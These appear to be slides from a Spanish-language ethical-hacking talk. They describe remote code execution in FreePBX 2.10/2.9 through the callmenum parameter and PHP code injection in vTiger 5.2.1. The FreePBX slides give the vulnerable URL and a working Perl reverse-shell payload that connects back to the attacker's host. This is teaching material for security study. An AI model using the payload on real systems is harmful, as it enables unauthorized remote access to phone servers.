  • 22. FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution Vulnerabilidad es de tipo “Remote Code Execution Exploit” , es decir inyecta código en una página no autentificada variables que generan la ejecución de sentencias del sistema operativo vía la función “system” de asterisk , Resultado : genera una conexión reversa desde el host atacado hacia el host del atacante vía el puerto 443.
  • 24.
  • 25.
  • 26. URL A LA CUAL INGRESA EL PROGRAMA: /recordings/misc/callme_page.php?action=c&callmenum='
  • 27. CODIGO QUE INYECTA UN POCO FEO NO ???
  • 28. CODIGO QUE INYECTA str(extension) '@from-internal/n Application: system Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"' str(lhost) ':' str(lport) '"); STDIN->fdopen($c,r); $~->fdopen($c,w);system$_ while<>;' Ahora si la veo !!
  • 29.
  • 30. Bingo , tengo shell !!
  • 31. AHORA VAMOS A LA PRACTICA DEMO TIME !! Exploit en Freepbx 2.10
  • 33. PHP CODE INYECTION en VTIGER 5.2.1 Descripción : El fundamento básico de esta técnica, es inyectar código arbitrario , como lo hace una inyección SQL Resultado : Obtención de una Shell reversa.
  • 35.
  • 36. Gracias !!! Juan Oliva Consultor en Ethical Hacking y Voip gtalk :jroliva@gmail.com Twiter : @jroliva Blog : http://jroliva.wordpress.com/